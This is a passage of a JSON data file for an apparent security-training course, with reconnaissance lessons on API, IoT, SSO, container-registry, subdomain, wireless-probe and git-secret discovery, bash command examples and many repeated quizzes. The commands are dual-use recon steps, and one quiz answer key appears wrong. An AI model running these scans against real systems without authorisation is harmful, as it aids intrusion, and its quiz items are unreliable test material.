endpoints.","sections":[{"type":"text","content":"Serverless functions behind API Gateway may lack auth. Enumerate via brute-forcing paths, JS analysis, and error message fingerprinting."},{"type":"code","lang":"bash","content":"ffuf -u https://api.target.com/FUZZ -w api-paths.txt -mc 200,403\ncurl https://api.target.com/prod/admin 2>&1 | grep -i lambda\n# Error messages reveal: function name, runtime, region"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Exposed Lambda functions are found via...","opts":["Port scanning","Path fuzzing and error message analysis","DNS enum","ARP spoofing"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1}]},{"id":"r-iot-recon","cat":"Reconnaissance","title":"IoT Device Reconnaissance","diff":3,"xp":200,"intro":"Find and fingerprint IoT devices on the target network.","sections":[{"type":"text","content":"IoT devices often run default creds, outdated firmware, and expose management interfaces. Shodan, Censys, and local scanning reveal them."},{"type":"code","lang":"bash","content":"shodan search 'port:554 has_screenshot:true'  # cameras\nshodan search 'port:1883 mqtt'  # MQTT brokers\nnmap -sV -p 80,443,554,1883,8080,8883 10.0.0.0/24"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"IoT devices are high-risk because...","opts":["They're expensive","They often have default creds and no updates","They're encrypted","They use strong auth"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1}]},{"id":"r-sso-recon","cat":"Reconnaissance","title":"SSO and Identity Provider Recon","diff":4,"xp":250,"intro":"Identify SSO providers and enumerate auth endpoints.","sections":[{"type":"text","content":"Organizations use Okta, Azure AD, OneLogin, etc. Identify the IdP from login redirects, enumerate SAML endpoints, and find misconfigurations."},{"type":"code","lang":"bash","content":"curl -s -L https://target.com/login 2>&1 | grep -iE 'okta|azure|onelogin|auth0|saml'\ncurl -s https://target.com/.well-known/openid-configuration\ncurl -s https://login.microsoftonline.com/target.com/.well-known/openid-configuration"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SSO recon reveals...","opts":["Passwords","The identity provider and authentication endpoints","Firewall rules","Database schema"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1}]},{"id":"r-api-versioning","cat":"Reconnaissance","title":"API Version Enumeration","diff":2,"xp":150,"intro":"Find old, less-secured API versions still accessible.","sections":[{"type":"text","content":"APIs evolve: /v1/ may lack auth that /v3/ enforces. Enumerate all versions."},{"type":"code","lang":"bash","content":"for v in v1 v2 v3 api-v1 api-v2; do\n  curl -s -o /dev/null -w '%{http_code} /'$v'\\n' https://api.target.com/$v/users\ndone"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Old API versions are dangerous because...","opts":["They're faster","They may lack security controls added in newer versions","They're encrypted","They use different ports"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1}]},{"id":"r-container-registry-enum","cat":"Reconnaissance","title":"Container Registry Discovery","diff":4,"xp":250,"intro":"Find exposed Docker registries leaking images and secrets.","sections":[{"type":"text","content":"Public container registries expose source code, configs, and hardcoded secrets in image layers."},{"type":"code","lang":"bash","content":"curl -s https://registry.target.com/v2/_catalog\ncurl -s https://registry.target.com/v2/app/tags/list\ndocker pull registry.target.com/app:latest\ndocker history --no-trunc registry.target.com/app:latest"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Exposed container registries leak...","opts":["Network topology","Source code and hardcoded secrets in image layers","DNS records","Firewall rules"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1}]},{"id":"r-subdomain-permutation","cat":"Reconnaissance","title":"Subdomain Permutation Scanning","diff":3,"xp":200,"intro":"Generate and test subdomain variations beyond simple wordlists.","sections":[{"type":"text","content":"Permutation tools combine known subdomains with common patterns: dev-api, staging-v2, internal-admin."},{"type":"code","lang":"bash","content":"# altdns generates permutations\naltdns -i known-subs.txt -o permutations.txt -w words.txt\n# Resolve permutations\nmassdns -r resolvers.txt permutations.txt -o S | grep -v NXDOMAIN"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Permutation scanning finds subdomains that...","opts":["Simple wordlists miss","Don't exist","Are encrypted","Use different protocols"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1}]},{"id":"r-threat-actor-tracking","cat":"Reconnaissance","title":"Threat Actor Infrastructure Tracking","diff":5,"xp":300,"intro":"Track APT groups by pivoting through their infrastructure patterns.","sections":[{"type":"text","content":"APT groups reuse infrastructure patterns: SSL cert issuers, hosting providers, domain registrars, WHOIS patterns, and TLS fingerprints (JA3/JA4)."},{"type":"code","lang":"bash","content":"# JA3 fingerprint matching\n# Known APT JA3 hash -> search across all connections\n# Passive DNS pivoting from known C2\ncurl -s 'https://api.securitytrails.com/v1/domain/evil.com/subdomains' -H 'apikey: KEY'\n# WHOIS pattern analysis\n# Same registrant email across multiple domains"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Threat actor tracking uses...","opts":["Vulnerability scanning","Infrastructure pattern analysis: certs, hosting, WHOIS, JA3","Password cracking","Social engineering"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1}]},{"id":"r-wireless-client-probe","cat":"Reconnaissance","title":"Wireless Client Probe Analysis","diff":3,"xp":200,"intro":"Capture probe requests to identify devices and previously connected networks.","sections":[{"type":"text","content":"Devices broadcast probe requests for known networks. Capture these to learn: device types, previously visited locations (hotel WiFi names), and MAC addresses."},{"type":"code","lang":"bash","content":"airodump-ng wlan0mon --band abg\n# Probe requests show:\n# - Device MAC\n# - SSIDs the device is looking for\n# - Device type (from OUI lookup)\ntshark -i wlan0mon -Y 'wlan.fc.type_subtype == 0x04' -T fields -e wlan.sa -e wlan_mgt.ssid"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Probe requests reveal...","opts":["Passwords","Devices and networks they've previously connected to","Server versions","Firewall rules"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1}]},{"id":"r-code-repo-secrets","cat":"Reconnaissance","title":"Code Repository Secret Scanning","diff":2,"xp":150,"intro":"Scan git history for accidentally committed secrets.","sections":[{"type":"text","content":"Secrets committed then removed are still in git history. Tools scan all commits for patterns matching API keys, passwords, and tokens."},{"type":"code","lang":"bash","content":"trufflehog git file://./repo\ngitleaks detect -s ./repo\n# GitHub-wide search\ntrufflehog github --org targetcorp --only-verified"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. 